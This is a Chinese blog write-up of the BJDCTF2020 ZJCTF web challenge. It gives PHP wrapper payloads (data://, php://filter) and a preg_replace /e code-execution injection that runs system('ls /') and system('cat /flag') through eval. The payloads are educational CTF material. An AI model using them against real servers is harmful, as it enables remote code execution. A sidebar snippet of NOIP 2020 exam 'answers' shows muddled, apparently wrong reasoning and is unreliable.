[BJDCTF2020]ZJCTF,不过如此1详解

于 2024-04-16 15:46:25 发布
阅读量243 收藏 4
点赞数 5
文章标签: 网络安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77451464/article/details/137827119
版权

题目

1.用data构造伪协议

?text=data://text/plain,I have a dream

2.用php://filter构造伪协议

file=php://filter/read=convert.base64-encode/resource=next.php

总的:

url?text=data://text/plain,I have a dream&file=php://filter/read=convert.base64-encode/resource=next.php

具体可看我主页关于伪协议整理的知识

base64解码

解码:

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
   preg_replace( '/(' . $re . ')/ei','strtolower("\\1")', $str);
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
    @eval($_GET['cmd']);
}

preg_replace( '/(' . $re . ')/ei','strtolower("\\1")', $str);preg_replace()的/e模式存在命令执行漏洞

(只要看到了上面这一行代码,就想到用payload:\S*=${phpinfo()})

因此本题目构造

?id=1&\S*=${getFlag()}&cmd=system('ls /');

p?id=1&\S*=${getFlag()}&cmd=system('cat /flag');

注意:id随便设置 结尾要有分号

Fly_hao.belief
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[BJDCTF2020]ZJCTF不过如此
05-07 340
<?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_mat.
BUUCTF- ZJCTF不过如此题目解析
2201_75327657的博客
03-29 189
发现有preg——replace说明有代码执行问题。源码中的\\1实际等于\1本身的\1有其他意思。打开查看源码查看有file说明是伪协议。preg——replace相关链接(得到base64编码解析出来为。那就利用filter查看。
BUUCTF [BJDCTF2020]ZJCTF不过如此(正则e模式漏洞)
qq_54929891的博客
03-06 2632
进去就是一串PHP代码,代码功能是:用GET方法传入text和file两个参数的值 (file_get_contents函数代表将名字为text的文件以只读的方式打开,并且将文件内容读入到一个字符串中),如果读入的内容是I have a dream,则会输出该字符串内容并且正则表达式来匹配file参数传入的值,若匹配失败则直接GG 这个时候我们要用到伪协议data了,它可以传递文件内容也可以执行函数(函数一般要base64),这里我们传递文件内容就行了text=data://text/plain...
[BUUCTF][BJDCTF2020]ZJCTF不过如此
cosmoslin的博客
01-24 720
考点 代码审计 命令执行 解题 打开环境 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br&
idea2020.1 常用设置图文详解
10-15
主要介绍了idea2020.1 常用设置,本文通过图文并茂的形式给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下
详解IntelliJ IDEA2020.1和JDK14体验
08-19
主要介绍了详解IntelliJ IDEA2020.1和JDK14体验,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
PHPStorm 2020.1 调试 Nodejs的多种方法详解
10-14
主要介绍了PHPSTORM 2020.1 调试 Nodejs的多种方法详解,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下
2020年美赛D题详解.pdf
02-01
2020年美赛D题详解
详解基于IDEA2020.1的JAVA代码提示插件开发例子
08-19
主要介绍了详解基于IDEA2020.1的JAVA代码提示插件开发例子,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
[BJDCTF2020]ZJCTF不过如此 简单思路及做法
EC_Carrot的博客
12-07 827
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 稍微审计,发现需要读到文件内容为I have a dream,自然而然的就可以想到用伪协议来做题! 注释里提醒了next.php,我们同样用伪协议base64加密来读文件 data://text/plain, php://input 读到的内容解码出来 <?php $id = $_GET['id']; $_SESSION['id'] =
2019-ZJCTF
ChenZIDu的博客
12-13 1090
浙江省大学生网络安全竞赛:逆转思路 这题当初没做出来,可惜了。 主要是php序列化,以及data协议。 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="w...
[BJDCTF2020]ZJCTF不过如此(php双引号、伪协议、preg_replace)
qq_43622442的博客
05-09 1790
[BJDCTF2020]ZJCTF不过如此(php双引号、伪协议、preg_replace) 1.打开网站,审计,第一个if可以用php://input 或者 data://伪协议绕过,php伪协议分析可看php伪协议: 2.然后往下,提示next.php文件,这里可以用php://filter伪协议拿到它的源码: 3.payload: http://90812d78-a226-4cdf-be8f-8baa9961fb89.node3.buuoj.cn/?text=php://input&f
[BJDCTF2020]ZJCTF不过如此(preg_replace /e 模式下的代码漏洞问题)
xlcvv的博客
04-30 595
题目给了源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_ge...
[BJDCTF2020]ZJCTF不过如此1
qq_48008847的博客
07-16 1633
通过分析代码,get传入两个参数text和file,text参数利用file_get_contents()函数只读形式打开,打开后内容要与"I have a dream"字符串相匹配,才能执行下面的文件包含$file参数。 看到用的是file_get_contents()函数打开text参数,以及后面的文件包含函数,自然的想到php伪协议中的data://协议用filter协议去读下next.php的源码 获取next.php的payload: index.php?text=data://text..
2020noip初赛试题答案详解
最新发布
08-15
2020年NOIP初赛试题答案详解如下: 1. 小明有6只不同颜色的小球,分别放在6个盒子里。首先,他从第1个盒子取出一个球,放在第2个盒子里;然后,把第2个盒子里的球放在第3个盒子里;接着,将第3个盒子里的球放在第4个盒子里;以此类推,最后将第6个盒子里的球放在第1个盒子里。经过这样的操作后,小明发现每个盒子里的球的颜色都发生了变化,问小明一共进行了多少次操作? 解析:考察循环移位。根据题意可得,第i个盒子的球颜色经过了i次移动。最后小球不变颜色的唯一情况是做了6次循环移位,即每个盒子自己取出了一次球并放回原来的盒子,即可得答案为6。 2. 给定一个长度为n的正整数序列,将序列中的数字分为两个集合A和B,要求集合A的和与集合B的和差的绝对值最小。请问此时集合A中的数字个数最多可能有多少个? 解析:考察动态规划。定义一个二维数组dp,dp[i][j]表示前i个数字构成的集合A的和是否等于j。初始dp[0][0]=true,然后遍历数组,对于第i个数字nums[i],更新dp[i][j]:若dp[i-1][j-nums[i]]为true,则dp[i][j]也为true。最后从sum/2开始,倒序遍历,找到第一个dp[n][j]=true的j值,即为集合A中的数字个数最多的情况。 3. 给定一个字符串,统计其中出现次数最多的字符的个数,并求出这些字符的ASCII码的平均值。 解析:利用哈希表统计字符出现的次数。遍历字符串,对于每个字符,将其在哈希表中对应的计数加1。然后遍历哈希表,找出计数最大的次数,即为出现次数最多的字符的个数。接着遍历哈希表,计算总和及个数,最后除以个数求平均值,即为字符的ASCII码的平均值。 以上是2020年NOIP初赛试题答案的详细解析。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值